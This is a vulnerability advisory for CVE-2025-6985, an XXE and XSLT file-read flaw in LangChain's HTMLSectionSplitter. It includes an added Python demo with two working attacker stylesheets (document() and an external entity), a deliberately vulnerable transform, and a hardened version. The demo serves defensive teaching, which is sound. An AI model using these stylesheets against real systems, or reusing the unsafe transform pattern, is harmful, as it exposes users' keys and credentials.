XML External Entity Vulnerability in LangChain Text Splitters by LangChain
CVE-2025-6985

7.5 HIGH

Key Information:

Vendor: LangChain
CVE Published: 6 October 2025

What is CVE-2025-6985?

The HTMLSectionSplitter class in LangChain Text Splitters version 0.3.8 is vulnerable to XML External Entity (XXE) attacks through unsafe XSLT processing. It accepts arbitrary XSLT stylesheets and hands them to lxml without any safeguards, so an attacker who controls the stylesheet can read sensitive files reachable by the LangChain process, such as SSH keys and .env files. Two lxml behaviours are involved: in some lxml versions the XML parser resolves external entities by default, and even in later versions that disable entity expansion, the XSLT document() function can still load local files unless access is explicitly restricted. Exploitation requires no authentication, privileges, or user interaction, which makes the issue especially concerning for default installations that permit custom XSLT.
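The following is an added example, not LangChain's own code and not the vulnerable HTMLSectionSplitter itself: a minimal stand-in for an XSLT-driven HTML splitter, shown first with lxml's permissive defaults and then hardened. It exercises both vectors the description names, a classic external entity in the stylesheet's DTD and the XSLT document() function, against a constructed secret file. The secret, the stylesheets, the HTML input and all function names are constructed for the demo and are not LangChain identifiers.

```python
# Added example, not LangChain's own code: a minimal stand-in for an
# XSLT-driven HTML splitter, first with lxml's permissive defaults and
# then hardened. The secret file, the stylesheets and the HTML input are
# constructed for the demo; the function names are assumptions.
import os
import tempfile
from pathlib import Path

from lxml import etree

# Constructed secret. It is well-formed XML because libxslt's document()
# only loads parseable XML: a raw SSH key fails to parse, but .xml or
# .plist configs, or an XML-wrapped key, load fine.
SECRET_MARKER = "sk-constructed-secret"
SECRET_XML = f"<config><api_key>{SECRET_MARKER}</api_key></config>".encode()

# Constructed HTML to "split"; its content plays no part in the attack.
HTML_INPUT = b"<html><body><h1>Title</h1><p>body text</p></body></html>"


def write_constructed_secret() -> str:
    """Write the constructed secret to a temp file and return its path."""
    fd, path = tempfile.mkstemp(suffix=".xml")
    with os.fdopen(fd, "wb") as fh:
        fh.write(SECRET_XML)
    return path


def document_function_stylesheet(path: str) -> bytes:
    """Attacker stylesheet: XSLT document() pulls a local file into the output."""
    uri = Path(path).resolve().as_uri()
    return f"""<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <leak><xsl:copy-of select="document('{uri}')"/></leak>
  </xsl:template>
</xsl:stylesheet>""".encode()


def external_entity_stylesheet(path: str) -> bytes:
    """Attacker stylesheet: classic XXE via an external general entity."""
    uri = Path(path).resolve().as_uri()
    return f"""<!DOCTYPE x [<!ENTITY secret SYSTEM "{uri}">]>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><leak>&secret;</leak></xsl:template>
</xsl:stylesheet>""".encode()


def transform_unsafe(xslt_src: bytes, html: bytes) -> str:
    """Vulnerable pattern: untrusted stylesheet, default XMLParser, and an
    XSLT object with no access_control, so document() may read any file."""
    xslt_doc = etree.fromstring(xslt_src)
    transform = etree.XSLT(xslt_doc)
    return str(transform(etree.fromstring(html, etree.HTMLParser())))


# Hardened parser for the stylesheet itself: no entity substitution, no
# DTD loading, no network access.
SAFE_XSLT_PARSER = etree.XMLParser(
    resolve_entities=False, load_dtd=False, no_network=True
)


def transform_safe(xslt_src: bytes, html: bytes):
    """Hardened pattern: stylesheet parsed with SAFE_XSLT_PARSER and run
    under XSLTAccessControl.DENY_ALL, so document() cannot read files or
    fetch URLs. Returns the output, or None if lxml rejects the stylesheet."""
    try:
        xslt_doc = etree.fromstring(xslt_src, SAFE_XSLT_PARSER)
        transform = etree.XSLT(
            xslt_doc, access_control=etree.XSLTAccessControl.DENY_ALL
        )
        return str(transform(etree.fromstring(html, etree.HTMLParser())))
    except etree.LxmlError:
        return None


def leaked(output) -> bool:
    """True if the secret marker made it into the transform output."""
    return output is not None and SECRET_MARKER in output


def run_demo() -> dict:
    """Run both attacker stylesheets through both code paths.
    Returns {vector: {"unsafe_leaks": bool, "safe_leaks": bool}}."""
    path = write_constructed_secret()
    results = {}
    try:
        for name, build in (("document()", document_function_stylesheet),
                            ("entity", external_entity_stylesheet)):
            src = build(path)
            try:
                unsafe_out = transform_unsafe(src, HTML_INPUT)
            except etree.LxmlError:  # newer lxml may reject the entity
                unsafe_out = None
            results[name] = {"unsafe_leaks": leaked(unsafe_out),
                             "safe_leaks": leaked(transform_safe(src, HTML_INPUT))}
    finally:
        os.remove(path)
    return results


if __name__ == "__main__":
    for vector, flags in run_demo().items():
        print(f"{vector:10s} {flags}")
```

Run as a script to see the flags for each vector. With the vulnerable pattern the document() row leaks regardless of lxml version, which is the second point in the description; whether the entity row leaks on the unsafe path depends on the lxml version's default for resolve_entities, which is the first point. The hardened path closes both by combining a parser that does not substitute entities with XSLTAccessControl.DENY_ALL. If an application genuinely needs document() for a known set of resources, a narrower XSLTAccessControl together with a parser resolver that serves only allow-listed URIs is the alternative to DENY_ALL; accepting arbitrary stylesheets with no access control is the pattern this CVE describes.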

Affected Version(s)

langchain-ai/langchain <= unspecified

CVSS V3.0

Score: 7.5
Severity: HIGH
Confidentiality: High
Integrity: None
Availability: None
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged

Timeline

  • Vulnerability published: 6 October 2025

  • Vulnerability reserved
